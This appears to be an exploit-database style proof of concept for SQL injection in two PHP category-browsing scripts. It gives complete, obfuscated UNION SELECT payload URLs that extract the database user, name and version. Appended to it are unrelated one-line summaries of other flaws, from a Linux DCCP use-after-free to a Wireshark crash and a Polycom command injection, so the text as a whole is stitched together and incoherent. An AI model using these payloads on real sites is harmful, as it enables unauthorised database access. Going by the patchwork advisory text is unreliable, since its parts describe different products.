The vulnerability allows an attacker to inject SQL commands.

Proof of Concept:

1) http://localhost/[PATH]/browse-category.php?cat=[SQL]
-91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+-
http://server/browse-category.php?cat=-91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+-

2) http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
-34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+-
http://server/browse-scategory.php?sc=-34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+-
The vulnerability allows an attacker to inject SQL commands by sending a malicious payload in the 'pid' parameter of the 'single-cause.php' script.
The vulnerability allows an attacker to inject SQL commands by sending a maliciously crafted HTTP request to the vulnerable application. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database.
The vulnerability allows an attacker to upload an arbitrary file: an arbitrary file can be uploaded as a user's profile picture.
Upon connection the victim is sent a specially crafted buffer overwriting the SEH record, resulting in code execution.
The vulnerability allows an attacker to inject SQL commands into the vulnerable parameter 'id' of the domain.php script. An example of the exploit is provided in the proof of concept section.
When a DCCP socket is in the DCCP_LISTEN state and the connect() system call is made with AF_UNSPEC, dccp_disconnect() puts the socket into the DCCP_CLOSED state but forgets to free dccps_hc_rx_ccid and dccps_hc_tx_ccid and set them to NULL. When connect() is then called again with an AF_INET6 sockaddr, the socket is cloned via dccp_create_openreq_child(), which returns a new sock object holding references to the dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old sock object, so both the old and the new sock object can use the same memory.
The CIP Safety dissector could crash, making Wireshark vulnerable to a Denial of Service attack. It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.
Within the Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows an attacker to execute arbitrary payloads via telnet or openssl.
SQL injection in the GET parameter 'token'. The payloads used are boolean-based blind, AND/OR time-based blind, and UNION query.